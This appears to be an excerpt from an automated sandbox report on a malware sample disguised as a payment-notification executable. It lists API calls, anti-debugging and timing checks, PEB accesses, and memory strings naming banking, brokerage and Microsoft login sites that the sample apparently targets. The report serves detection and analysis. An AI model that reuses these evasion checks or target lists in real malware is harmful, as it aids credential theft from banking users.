Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009A9B2B
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009A5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325BAB0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0325BAB0

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009342DE

Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: F56GKLK7U4.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: F56GKLK7U4.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: F56GKLK7U4.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: F56GKLK7U4.5.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: netbtugc.exe, 00000005.00000002.3760623624.000000000345E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1748359990.0000023011ADC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.5.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: F56GKLK7U4.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: F56GKLK7U4.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: F56GKLK7U4.5.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: F56GKLK7U4.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3761584389.000000000172F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: F56GKLK7U4.5.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: F56GKLK7U4.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: F56GKLK7U4.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: F56GKLK7U4.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_003C7823 LdrLoadDll,

2_2_003C7823

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009AEAA2 BlockInput,

0_2_009AEAA2

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00962622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00962622

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009342DE

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00954CE8 mov eax, dword ptr fs:[00000030h]	0_2_00954CE8
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_01316E50 mov eax, dword ptr fs:[00000030h]	0_2_01316E50
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_01316EB0 mov eax, dword ptr fs:[00000030h]	0_2_01316EB0
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_013157C0 mov eax, dword ptr fs:[00000030h]	0_2_013157C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
